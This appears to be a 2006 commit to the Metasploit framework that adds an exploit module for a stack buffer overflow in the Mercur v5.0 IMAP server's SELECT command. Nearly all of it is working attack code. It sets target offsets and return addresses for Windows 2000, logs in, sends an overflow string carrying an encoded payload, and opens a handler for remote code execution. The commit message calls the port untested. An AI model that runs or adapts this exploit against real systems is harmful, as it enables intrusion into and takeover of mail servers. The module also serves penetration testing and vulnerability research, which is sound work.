ported mercur_imap_select_overflow.pm, untested.

git-svn-id: file:///home/svn/framework3/trunk@4245 4d416f70-5f16-0410-b530-b9f4589650da
2006-12-31 00:10:16 +00:00 · 2006-12-31 00:10:16 +00:00 · 84c7edbbc5
parent 7da10dd53e
commit 84c7edbbc5
1 changed files with 68 additions and 0 deletions
--- a/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
+++ b/modules/exploits/windows/imap/mercur_imap_select_overflow.rb
@ -0,0 +1,68 @@
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Imap::Mercur_Imap_Select_Overflow < Msf::Exploit::Remote
+
+	include Exploit::Remote::Imap
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Mercur v5.0 IMAP SP3 SELECT Buffer Overflow',
+			'Description'    => %q{
+				Mercur v5.0 IMAP server is prone to a remotely exploitable 
+				stack-based buffer overflow vulnerability. This issue is due 
+				to a failure of the application to properly bounds check 
+				user-supplied data prior to copying it to a fixed size memory buffer.
+				Credit to Tim Taylor for discover the vulnerability.
+			},
+			'Author'         => [ 'Jacopo Cervini <acaro [at] jervus.it>' ],
+			'License'        => BSD_LICENSE,
+			'Version'        => '$Revision: 3782 $',
+			'References'     =>
+				[
+					[ 'BID', '17138' ],
+				],
+			'Privileged'     => true,
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 400,
+					'BadChars' => "\x00",
+					'StackAdjustment' => -3500,
+
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					['Windows 2000 Server SP4 English',  { 'Offset' => 126, 'Ret' => 0x13e50b42 }],
+					['Windows 2000 Pro SP1 English',     { 'Offset' => 127, 'Ret' => 0x1446e242 }],
+				],
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Mar 17 2006'))
+
+	end
+	
+	def exploit
+		sploit =  "a001 select " + "\x43\x49\x41\x4f\x20\x42\x41\x43\x43\x4f\x20"  
+		sploit << rand_text_alpha_upper(94) + rand_text_alpha_upper(target['Offset'])   
+		sploit << [target.ret].pack('V') + "\r\n" + rand_text_alpha_upper(8) 
+		sploit << payload.encoded + rand_text_alpha_upper(453)  
+
+		info = connect_login 
+		
+		if (info == true)
+			print_status("Trying target #{target.name} using heap address at 0x%.8x..." % target.ret)
+			sock.put(sploit + "\r\n")
+		else
+			print_status("Not falling through with exploit")	
+		end
+		
+		handler
+		disconnect
+	end
+end
+end